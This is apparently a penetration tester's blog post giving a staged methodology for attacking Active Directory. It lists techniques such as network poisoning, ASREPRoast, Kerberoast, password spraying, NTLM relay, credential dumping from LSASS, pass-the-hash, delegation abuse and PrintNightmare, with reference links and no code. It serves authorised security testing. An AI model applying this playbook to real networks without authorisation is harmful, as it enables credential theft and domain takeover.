Active Directory Attack Methodology

R3zk0n ยท October 2, 2025

Active Directory   IaC   Network   OSINT   Privilege Escalation   Recon   Security   Windows
Contents

    Low Hanging Fruit

    • Standard Infrastructure penetration testing of the network
    • Check for null and Guest access on SMB services (if older version of Windows)
    • Enumerate SMB
    • Enumerate LDAP
    • Network Poisoning (LLMNR, NBT-NS, mDNS)
      • https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks
    • evil-SSDP (UPnP spoofing)
    • OSINT (generate usernames)
    • Steal NTLM Creds (If authenticated to server, trigger responder)

    If NO USERNAME

    • Anonymous SMB/LDAP enum
    • Kerbrute enum (Username enumeration but for Kerberos)
    • OWA (Outlook Web Access) Server

    If USERNAME

    • ASREPRoast (Kerberos without pre-authentication)
    • Password Spraying
    • NTLM Relay attack (SMB Signing Disabled)
      • https://www.qomplx.com/qomplx-knowledge-ntlm-relay-attacks-explained/
      • https://infosecwriteups.com/abusing-ntlm-relay-and-pass-the-hash-for-admin-d24d0f12bea0
    • Steal NTLM Creds

    If CREDENTIALS + SESSION

    • ASREPRoast (but all users)
    • Password Spraying (try more accounts with wider scope)
    • Basic recon
      • CMD: https://book.hacktricks.xyz/windows-hardening/basic-cmd-for-pentesters#domain-info
      • Powershell: https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters
      • Powerview: https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview
      • Bloodhound + Other tools: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/bloodhound
    • Other recon: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology
    • Remote connection to other machines
    • Local privilege escalation (dump creds from LSASS and SAM)
    • Kerberoast (Harvest TGS tickets, requires any domain account)
    • Current Session Tickets (unlikely)
    • NTLM Relay attack (SMB Signing Disabled)
    • Look for credentials in network shares (SMB)
    • Steal NTLM Creds
    • CVE-2021-1675/CVE-2021-34527 PrintNightmare (local administrator + DC)

    If PRIVILEGED CREDENTIALS + SESSION

    • Hash extraction (as local administrator)
    • Pass the Hash (impersonation of user)
    • Over Pass the Hash/Pass the Key (NTLM to request a kerberos ticket)
    • Pass the Ticket
    • Credentials Reuse
    • MSSQL Abuse & Trusted Links
    • Kerberos
      • Unconstrained Delegation
      • Constrained Delegation
      • Resource-based Constrained Delegation
    • ACL Abuse
      • https://learn.microsoft.com/en-us/windows/win32/adschema/extended-rights
    • Printer Spooler service abuse

    Twitter, Facebook